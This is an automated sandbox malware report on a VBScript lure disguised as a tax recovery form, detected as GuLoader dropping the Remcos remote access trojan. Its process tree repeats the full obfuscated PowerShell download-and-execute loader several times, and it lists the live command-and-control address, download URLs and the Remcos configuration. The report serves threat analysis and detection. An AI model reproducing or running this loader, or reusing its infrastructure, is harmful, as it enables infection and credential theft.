Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Custom Export Tax Recovery Form.vbs

Overview

General Information

Sample name:Custom Export Tax Recovery Form.vbs
Analysis ID:1533044
MD5:36ffacaa0e821c2912bed0735361e00a
SHA1:c079a264f1b14321464ebe3d4d623768432f0b22
SHA256:35950af50b6f5b0a6d108fbac7d8e4dedc6b09b07b4a79c1daa77486254bd7c4
Tags:vbsuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for domain / URL
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

  • System is w10x64
  • wscript.exe (PID: 1764 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Custom Export Tax Recovery Form.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1908 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Offentlighedslovgivninger Raakremers Miljforstyrrelserne Daarligst Coniferous #>;$selsret='Valgets';<#Glattede Microscopal Jordvarmeanlggets Confirmatory Onerative Rheobase #>;$Dks=$Leuma+$host.UI;If ($Dks) {$syltetjskrukke++;}function Capulet43($Blimpishly){$Unvomitednefficiencies=$Berendo+$Blimpishly.'Length'-$syltetjskrukke; for( $Unvomited=3;$Unvomited -lt $Unvomitednefficiencies;$Unvomited+=4){$Mythol++;$Overpositiveness+=$Blimpishly[$Unvomited];$Fatalismens='Usurption';}$Overpositiveness;}function Donought($Folkeskolerne){ & ($afire) ($Folkeskolerne);}$Prestigiously100=Capulet43 'BloMCheo rz dei MulDerlsvia En/Ret ';$Prestigiously100+=Capulet43 'Ca 5Kae. Mo0sk I,d(D pWGa.isvune.edBodoOpdwConsCre Ph,N K.T ac b m1Nob0Fol. ,a0di ;Met RbdW ,ai,tin.or6 No4Bou;Tr, Tex .a6N t4 Un;Ret sp.rCouvF l:No,1In 3 Mi1Eld.Par0Al.)Tur GerGMyresrncAssk Bro De/B g2Tat0B r1Bro0 s 0P.r1Rev0Unm1.ro OrrFGl iBegr Que.rofOrio Opxmav/T,r1Kin3U e1 sk.Mic0Jos ';$Extrality=Capulet43 ' yguseksDefefi R Af-Am,AOpsgTrvetraNTret .n ';$Dolkhalerne=Capulet43 'Naph HatLvhtPropFu.:Bef/Ter/GyslsemnFem6BokbEl,9sub.Unes UnhVe oegap os/RalaQuimrecy.edkD.thsukRL ec BiMRet/ FlR ReeDigdsteoZn b relseliConn,ingPhi.Fo pPrissbed ,o ';$Unvomitednddelingens=Capulet43 'P.a> si ';$afire=Capulet43 'BilIEupEsp XE,t ';$Ceratitidae='goldsmithing';$Udskrivningsprogrammets='\Enspnderen.rep';Donought (Capulet43 'sun$GraG ,oLHenOTomB ekaA rL Uf: ,aMR,sEDiadEnsIBlgCC liBioN LnE,ar=Ple$P geWo,nYv vnav:s cAUdspHiePBesDMisAEuttsmaA T,+Eph$Fa URygdPies.ymK laR GliBayvLisnAzoI KoNskrg RisRdlpsalRRygoD sG E R .yA ChmlapMMule .rTMo s la ');Donought (Capulet43 'spi$UdmgCrilManO urBIm.a lmL Fo:Park WoOMe nInsssv oFolL siiEksdT aEFilr iqIMurnc.aGC,s=Eja$DegD Beos.plslaksarHOstaParLTile U RfirNspje Fu. issLizPUnplPeriK fTMul( y$ PoUArbN unvBuro,remsayiFletB,lEOs DB nn RedsotDGr.EsimLBeniOveNFi gProE NonNevsBge)Red ');Donought (Capulet43 'Cyk[L,nnHypERenT od. s sF.nECauRLynvDatIMa cMulescep jaoProI spnNontTemMHj AImpn.veACapgTacEEquR Re]De :,mp:Ra,sM seModc enUVinrD ciC ltAmpyGripGriRRoro HetHanO H C B ORe l.og En =r r pit[Inan isE NoTsk..AutsNatEFl c R U D RTraI.abT esYM.gP nrM no agT e OObdC ysoF iLBrst say,aspAdeeUbe]Gro:sem:Ka tsp Ls isPou1 La2 a ');$Dolkhalerne=$Konsolidering[0];$skovskadens177=(Capulet43 ' st$TilgP slHa Om sbI.da P LR v: aFMu.ONond BafLansN nT,ndEHypRkonNAftE elss a= HvnHocE OswFib-sa,oshiBsubj CrER dC eaTG r ErysCurY ,gsValtUndE t,mDoc.UnvN.paE FotK.n.IntW sye keB uc I L ri roeZenn ReTCou ');Donought ($skovskadens177);Donought (Capulet43 'Acc$MasfunpoOpbdUnsfOptsun t Aresk rHy n nueAfdsCa . H H.rseAfgaG odKnie InrbarsGry[In $P oEUn xD ttVierArtaUfolFriiVoctC uyPre] .t=Ena$ L,PTo,rE.beForsKu tApoiNongCo,iTetoshiuDa sIn.l.alysla1ste0 Ab0Raa ');$Taarnfalkes=Capulet43 'K e$KryfDhuoProdFrsf .asMeutvereFrorskrnUdbeVens rg.FraDT ao PowkacnUdblskrorepa skd saFMo i RelBlaeRan( Wi$ A D VeoRe l Pek RehApia Adl Tie orr AnnNateBac,Fas$C lD uyi ins PupTellUd.aU syEn.kAntoC.rrRoktEle)Rov ';$Displaykort=$Medicine;Donought (Capulet43 'Fil$F ugFrmlRagO.dsBTelAs yL Ea:dkko r sVanT emELi O iCFaroLarL MaLDysAKir= am(OmhTFeje CusLitTfor- arp BrAscotsynH In cac$Grad ReiUnbsAquP n lAbjAHegyTllkKonOJe r AmtTat)Bil ');while (!$Osteocolla) {Donought (Capulet43 'but$LevgGlolPerocolbVeca yplIsc:TinfOverU.deskalGrasTabesrsr ErsRe =,od$Wr tDumrKenu heeHyp ') ;Donought $Taarnfalkes;Donought (Capulet43 'GoysHusTBanAsivRTllt Pn-Mogs E LMetETe eBauPBo Reg4Ban ');Donought (Capulet43 ',am$Blig dil jaOKleBEmaareflP s:MetoPres Zot HaeMapOs nc UnoOutLFeuLRevaMns= Pl( .et OvEPacsLset nb- jPUnpA.toTPaihMil Gro$A lD L iAans,ntP N,lserAYadyHypk .uO OrRMost.nb) pa ') ;Donought (Capulet43 's j$K.sGRgsL L.OTilBsltAUndLVrv:sennI.eEH bIDisGUndHsilBUndoNatR miiskaNR ugElf2Ta 4 Fo1Lyk= de$ReggKugl DiOsp bTriaspgLOve: BuFgr,Is,iLErrL KuO.kow .ri F tArcEPhi+Pri+ Ad%Far$MaskAnaOT,gnVe s meOR,nLOffi NvDCy,eT drUnmiBasnAcyGMil.MalcA tOTrouBilNUp tHyp ') ;$Dolkhalerne=$Konsolidering[$Neighboring241];}$prefertilization=292042;$Wavenumber1=30384;Donought (Capulet43 'f l$Du.g B,LPsyoundbOprAGenlErg:PolBG uiResp R LC,aOTras MeIAgrVBesEpre1 ,n6Bra5Bar Rea=I e .gogToleDi.tPre-Ko,cPutOT eNDo tAsseRelN setDer suf$HrgDTrbiHyps T.PCapL BuA ,uyFagk skoTilR utNom ');Donought (Capulet43 ' Bi$ EkgDikl proUndbBl.a Bulsma:satKM,nvNe aPhynskat T.iNontLsresp tDicsNiem rsUn.sR cihe,gMadeInt syg=sov Gra[U ss layOprsDiutOveeP ems u.HasC emomasnservTh eRegr P tTv ]A b:Ter:,enFsamr ,nosammAutB MaaPe s re,or6Non4 bsskn.tUdkrPl iI pnTilgHan( G $ alBAdoiPropIrrlTraoHemsOutiCa vAr,este1 Al6Ga.5Bes)Rej ');Donought (Capulet43 ' he$ CrGW.oLOv oRegbLy AKomLKry:BrusH lK LiA,ntfTasfA,leGenr ConCooE.ng Pat=Erk la[ NosR kYsl s gat,npeTo mDe . reT G.EOsmxWintFul.abre ,iNC gCAlto Bad ejIHydNParGs i]Udb:Pan:sulAMotsDelC.veiKo,IMi . ArgInde ChTTilsFr TXerR Eni anDevgDec(Mal$ arKJa v ataGelNCamt skIBebTplee saTN nsMicMAfks glsManIHomGPe esqu)U s ');Donought (Capulet43 'Ni.$TakgspyLR.yOMidB stA A lsup: TiRComEPl n.igdDi.ePo,s.eptKatePronshaEOmoNsal=I d$ MasLikkKonaE,af .aFBabe.etr Ggn HeEs.o.AktsR.euAfbB es stT TorIntiB sNIroGA l(Pte$PecpL,gRthrE PrFAndeCalr.ulT alisgel WaI UvzuntA Wat.ariFraoBjeNDet, An$.irwV nA CoVBlaeB mnYa,UTrom,otBHaaEsupr yn1Ant) om ');Donought $Rendestenen;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 988 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Offentlighedslovgivninger Raakremers Miljforstyrrelserne Daarligst Coniferous #>;$selsret='Valgets';<#Glattede Microscopal Jordvarmeanlggets Confirmatory Onerative Rheobase #>;$Dks=$Leuma+$host.UI;If ($Dks) {$syltetjskrukke++;}function Capulet43($Blimpishly){$Unvomitednefficiencies=$Berendo+$Blimpishly.'Length'-$syltetjskrukke; for( $Unvomited=3;$Unvomited -lt $Unvomitednefficiencies;$Unvomited+=4){$Mythol++;$Overpositiveness+=$Blimpishly[$Unvomited];$Fatalismens='Usurption';}$Overpositiveness;}function Donought($Folkeskolerne){ & ($afire) ($Folkeskolerne);}$Prestigiously100=Capulet43 'BloMCheo rz dei MulDerlsvia En/Ret ';$Prestigiously100+=Capulet43 'Ca 5Kae. Mo0sk I,d(D pWGa.isvune.edBodoOpdwConsCre Ph,N K.T ac b m1Nob0Fol. ,a0di ;Met RbdW ,ai,tin.or6 No4Bou;Tr, Tex .a6N t4 Un;Ret sp.rCouvF l:No,1In 3 Mi1Eld.Par0Al.)Tur GerGMyresrncAssk Bro De/B g2Tat0B r1Bro0 s 0P.r1Rev0Unm1.ro OrrFGl iBegr Que.rofOrio Opxmav/T,r1Kin3U e1 sk.Mic0Jos ';$Extrality=Capulet43 ' yguseksDefefi R Af-Am,AOpsgTrvetraNTret .n ';$Dolkhalerne=Capulet43 'Naph HatLvhtPropFu.:Bef/Ter/GyslsemnFem6BokbEl,9sub.Unes UnhVe oegap os/RalaQuimrecy.edkD.thsukRL ec BiMRet/ FlR ReeDigdsteoZn b relseliConn,ingPhi.Fo pPrissbed ,o ';$Unvomitednddelingens=Capulet43 'P.a> si ';$afire=Capulet43 'BilIEupEsp XE,t ';$Ceratitidae='goldsmithing';$Udskrivningsprogrammets='\Enspnderen.rep';Donought (Capulet43 'sun$GraG ,oLHenOTomB ekaA rL Uf: ,aMR,sEDiadEnsIBlgCC liBioN LnE,ar=Ple$P geWo,nYv vnav:s cAUdspHiePBesDMisAEuttsmaA T,+Eph$Fa URygdPies.ymK laR GliBayvLisnAzoI KoNskrg RisRdlpsalRRygoD sG E R .yA ChmlapMMule .rTMo s la ');Donought (Capulet43 'spi$UdmgCrilManO urBIm.a lmL Fo:Park WoOMe nInsssv oFolL siiEksdT aEFilr iqIMurnc.aGC,s=Eja$DegD Beos.plslaksarHOstaParLTile U RfirNspje Fu. issLizPUnplPeriK fTMul( y$ PoUArbN unvBuro,remsayiFletB,lEOs DB nn RedsotDGr.EsimLBeniOveNFi gProE NonNevsBge)Red ');Donought (Capulet43 'Cyk[L,nnHypERenT od. s sF.nECauRLynvDatIMa cMulescep jaoProI spnNontTemMHj AImpn.veACapgTacEEquR Re]De :,mp:Ra,sM seModc enUVinrD ciC ltAmpyGripGriRRoro HetHanO H C B ORe l.og En =r r pit[Inan isE NoTsk..AutsNatEFl c R U D RTraI.abT esYM.gP nrM no agT e OObdC ysoF iLBrst say,aspAdeeUbe]Gro:sem:Ka tsp Ls isPou1 La2 a ');$Dolkhalerne=$Konsolidering[0];$skovskadens177=(Capulet43 ' st$TilgP slHa Om sbI.da P LR v: aFMu.ONond BafLansN nT,ndEHypRkonNAftE elss a= HvnHocE OswFib-sa,oshiBsubj CrER dC eaTG r ErysCurY ,gsValtUndE t,mDoc.UnvN.paE FotK.n.IntW sye keB uc I L ri roeZenn ReTCou ');Donought ($skovskadens177);Donought (Capulet43 'Acc$MasfunpoOpbdUnsfOptsun t Aresk rHy n nueAfdsCa . H H.rseAfgaG odKnie InrbarsGry[In $P oEUn xD ttVierArtaUfolFriiVoctC uyPre] .t=Ena$ L,PTo,rE.beForsKu tApoiNongCo,iTetoshiuDa sIn.l.alysla1ste0 Ab0Raa ');$Taarnfalkes=Capulet43 'K e$KryfDhuoProdFrsf .asMeutvereFrorskrnUdbeVens rg.FraDT ao PowkacnUdblskrorepa skd saFMo i RelBlaeRan( Wi$ A D VeoRe l Pek RehApia Adl Tie orr AnnNateBac,Fas$C lD uyi ins PupTellUd.aU syEn.kAntoC.rrRoktEle)Rov ';$Displaykort=$Medicine;Donought (Capulet43 'Fil$F ugFrmlRagO.dsBTelAs yL Ea:dkko r sVanT emELi O iCFaroLarL MaLDysAKir= am(OmhTFeje CusLitTfor- arp BrAscotsynH In cac$Grad ReiUnbsAquP n lAbjAHegyTllkKonOJe r AmtTat)Bil ');while (!$Osteocolla) {Donought (Capulet43 'but$LevgGlolPerocolbVeca yplIsc:TinfOverU.deskalGrasTabesrsr ErsRe =,od$Wr tDumrKenu heeHyp ') ;Donought $Taarnfalkes;Donought (Capulet43 'GoysHusTBanAsivRTllt Pn-Mogs E LMetETe eBauPBo Reg4Ban ');Donought (Capulet43 ',am$Blig dil jaOKleBEmaareflP s:MetoPres Zot HaeMapOs nc UnoOutLFeuLRevaMns= Pl( .et OvEPacsLset nb- jPUnpA.toTPaihMil Gro$A lD L iAans,ntP N,lserAYadyHypk .uO OrRMost.nb) pa ') ;Donought (Capulet43 's j$K.sGRgsL L.OTilBsltAUndLVrv:sennI.eEH bIDisGUndHsilBUndoNatR miiskaNR ugElf2Ta 4 Fo1Lyk= de$ReggKugl DiOsp bTriaspgLOve: BuFgr,Is,iLErrL KuO.kow .ri F tArcEPhi+Pri+ Ad%Far$MaskAnaOT,gnVe s meOR,nLOffi NvDCy,eT drUnmiBasnAcyGMil.MalcA tOTrouBilNUp tHyp ') ;$Dolkhalerne=$Konsolidering[$Neighboring241];}$prefertilization=292042;$Wavenumber1=30384;Donought (Capulet43 'f l$Du.g B,LPsyoundbOprAGenlErg:PolBG uiResp R LC,aOTras MeIAgrVBesEpre1 ,n6Bra5Bar Rea=I e .gogToleDi.tPre-Ko,cPutOT eNDo tAsseRelN setDer suf$HrgDTrbiHyps T.PCapL BuA ,uyFagk skoTilR utNom ');Donought (Capulet43 ' Bi$ EkgDikl proUndbBl.a Bulsma:satKM,nvNe aPhynskat T.iNontLsresp tDicsNiem rsUn.sR cihe,gMadeInt syg=sov Gra[U ss layOprsDiutOveeP ems u.HasC emomasnservTh eRegr P tTv ]A b:Ter:,enFsamr ,nosammAutB MaaPe s re,or6Non4 bsskn.tUdkrPl iI pnTilgHan( G $ alBAdoiPropIrrlTraoHemsOutiCa vAr,este1 Al6Ga.5Bes)Rej ');Donought (Capulet43 ' he$ CrGW.oLOv oRegbLy AKomLKry:BrusH lK LiA,ntfTasfA,leGenr ConCooE.ng Pat=Erk la[ NosR kYsl s gat,npeTo mDe . reT G.EOsmxWintFul.abre ,iNC gCAlto Bad ejIHydNParGs i]Udb:Pan:sulAMotsDelC.veiKo,IMi . ArgInde ChTTilsFr TXerR Eni anDevgDec(Mal$ arKJa v ataGelNCamt skIBebTplee saTN nsMicMAfks glsManIHomGPe esqu)U s ');Donought (Capulet43 'Ni.$TakgspyLR.yOMidB stA A lsup: TiRComEPl n.igdDi.ePo,s.eptKatePronshaEOmoNsal=I d$ MasLikkKonaE,af .aFBabe.etr Ggn HeEs.o.AktsR.euAfbB es stT TorIntiB sNIroGA l(Pte$PecpL,gRthrE PrFAndeCalr.ulT alisgel WaI UvzuntA Wat.ariFraoBjeNDet, An$.irwV nA CoVBlaeB mnYa,UTrom,otBHaaEsupr yn1Ant) om ');Donought $Rendestenen;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 3184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 6448 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6776 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ncxgt" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6780 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ywcrugzm" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6920 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\izpjvzjnjwl" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": "154.216.18.65:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-UXHRJ7", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
00000009.00000002.3406381912.0000000007B8A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000009.00000002.3406381912.0000000007BE1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000004.00000002.2486808594.0000000008E10000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000004.00000002.2468395369.000000000609A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          00000009.00000002.3406381912.0000000007BCD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            Click to see the 6 entries
            SourceRuleDescriptionAuthorStrings
            amsi64_1908.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

              System Summary

              barindex
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Custom Export Tax Recovery Form.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Custom Export Tax Recovery Form.vbs", CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Custom Export Tax Recovery Form.vbs", ProcessId: 1764, ProcessName: wscript.exe
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.67.128.117, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 6448, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49912
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Custom Export Tax Recovery Form.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Custom Export Tax Recovery Form.vbs", CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Custom Export Tax Recovery Form.vbs", ProcessId: 1764, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Offentlighedslovgivninger Raakremers Miljforstyrrelserne Daarligst Coniferous #>;$selsret='Valgets';<#Glattede Microscopal Jordvarmeanlggets Confirmatory Onerative Rheobase #>;$Dks=$Leuma+$host.UI;If ($Dks) {$syltetjskrukke++;}function Capulet43($Blimpishly){$Unvomitednefficiencies=$Berendo+$Blimpishly.'Length'-$syltetjskrukke; for( $Unvomited=3;$Unvomited -lt $Unvomitednefficiencies;$Unvomited+=4){$Mythol++;$Overpositiveness+=$Blimpishly[$Unvomited];$Fatalismens='Usurption';}$Overpositiveness;}function Donought($Folkeskolerne){ & ($afire) ($Folkeskolerne);}$Prestigiously100=Capulet43 'BloMCheo rz dei MulDerlsvia En/Ret ';$Prestigiously100+=Capulet43 'Ca 5Kae. Mo0sk I,d(D pWGa.isvune.edBodoOpdwConsCre Ph,N K.T ac b m1Nob0Fol. ,a0di ;Met RbdW ,ai,tin.or6 No4Bou;Tr, Tex .a6N t4 Un;Ret sp.rCouvF l:No,1In 3 Mi1Eld.Par0Al.)Tur GerGMyresrncAssk Bro De/B g2Tat0B r1Bro0 s 0P.r1Rev0Unm1.ro OrrFGl iBegr Que.rofOrio Opxmav/T,r1Kin3U e1 sk.Mic0Jos ';$Extrality=Capulet43 ' yguseksDefefi R Af-Am,AOpsgTrvetraNTret .n ';$Dolkhalerne=Capulet43 'Naph HatLvhtPropFu.:Bef/Ter/GyslsemnFem6BokbEl,9sub.Unes UnhVe oegap os/RalaQuimrecy.edkD.thsukRL ec BiMRet/ FlR ReeDigdsteoZn b relseliConn,ingPhi.Fo pPrissbed ,o ';$Unvomitednddelingens=Capulet43 'P.a> si ';$afire=Capulet43 'BilIEupEsp XE,t ';$Ceratitidae='goldsmithing';$Udskrivningsprogrammets='\Enspnderen.rep';Donought (Capulet43 'sun$GraG ,oLHenOTomB ekaA rL Uf: ,aMR,sEDiadEnsIBlgCC liBioN LnE,ar=Ple$P geWo,nYv vnav:s cAUdspHiePBesDMisAEuttsmaA T,+Eph$Fa URygdPies.ymK laR GliBayvLisnAzoI KoNskrg RisRdlpsalRRygoD sG E R .yA ChmlapMMule .rTMo s la ');Donought (Capulet43 'spi$UdmgCrilManO urBIm.a lmL Fo:Park WoOMe nInsssv oFolL siiEksdT aEFilr iqIMurnc.aGC,s=Eja$DegD Beos.plslaksarHOstaParLTile U RfirNspje Fu. issLizPUnplPeriK fTMul( y$ PoUArbN unvBuro,remsayiFletB,lEOs DB nn RedsotDGr.EsimLBeniOveNFi gProE NonNevsBge)Red ');Donought (Capulet43 'Cyk[L,nnHypERenT od. s sF.nECauRLynvDatIMa cMulescep jaoProI spnNontTemMHj AImpn.veACapgTacEEquR Re]De :,mp:Ra,sM seModc enUVinrD ciC ltAmpyGripGriRRoro HetHanO H C B ORe l.og En =r r pit[Inan isE NoTsk..AutsNatEFl c R U D RTraI.abT esYM.gP nrM no agT e OObdC ysoF iLBrst say,aspAdeeUbe]Gro:sem:Ka tsp Ls isPou1 La2 a ');$Dolkhalerne=$Konsolidering[0];$skovskadens177=(Capulet43 ' st$TilgP slHa Om sbI.da P LR v: aFMu.ONond BafLansN nT,ndEHypRkonNAftE elss a= HvnHocE OswFib-sa,oshiBsubj CrER dC eaTG r ErysCurY ,gsValtUndE t,mDoc.UnvN.paE FotK.n.IntW sye keB uc I L ri roeZenn ReTCou ');Donought ($skovskadens177);Donought (Capulet43 'Acc$MasfunpoOpbdUnsfOptsun t Aresk rHy n nueAfdsCa . H H.rseAfgaG odKnie InrbarsGry[In $P oEUn xD ttVierArtaUfolFriiVoctC uyPre] .t=Ena$ L,PTo,rE.beForsKu tApoiNongCo,iTetoshiuDa sIn.l.alysla1ste0 Ab0Raa ');$Taarnfalkes=Capulet43 'K e$KryfDhuoProdFrsf .asMeutvereFrorskrnUdbeVens rg.FraDT ao PowkacnUdblskrorepa skd saFMo i RelBlaeRan( Wi$ A D VeoRe l Pek RehApia Adl Tie orr AnnNa

              Stealing of Sensitive Information

              barindex
              Source: Registry Key setAuthor: Joe Security: Data: Details: FA 7A D4 CB A4 88 71 5F DB E9 69 0E 59 88 34 B3 30 B5 4C 6E 1E E7 9C DB 1B A7 8F EA 6B 16 27 DA 75 BE 23 B6 8C B8 0D DB 5C 7A 58 FA 40 7B 2E 67 D5 7D B8 F6 37 17 6C E9 62 AA 01 2D 9C 87 DB 7F , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 6448, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-UXHRJ7\exepath
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-14T11:07:21.335659+020020365941Malware Command and Control Activity Detected192.168.2.649928154.216.18.652404TCP
              2024-10-14T11:07:22.804496+020020365941Malware Command and Control Activity Detected192.168.2.649939154.216.18.652404TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-14T11:07:23.028037+020028033043Unknown Traffic192.168.2.649945178.237.33.5080TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000009.00000002.3406381912.0000000007BCD000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "154.216.18.65:2404:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-UXHRJ7", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Source: ln6b9.shopVirustotal: Detection: 13%Perma Link
              Source: http://ln6b9.shop/OxvwnGPq/OGaqsWdpjAA232.binVirustotal: Detection: 14%Perma Link
              Source: http://ln6b9.shop/amykhRcM/Redobling.psdVirustotal: Detection: 14%Perma Link
              Source: http://ln6b9.shopVirustotal: Detection: 13%Perma Link
              Source: Yara matchFile source: 00000009.00000002.3406381912.0000000007B8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3406381912.0000000007BE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
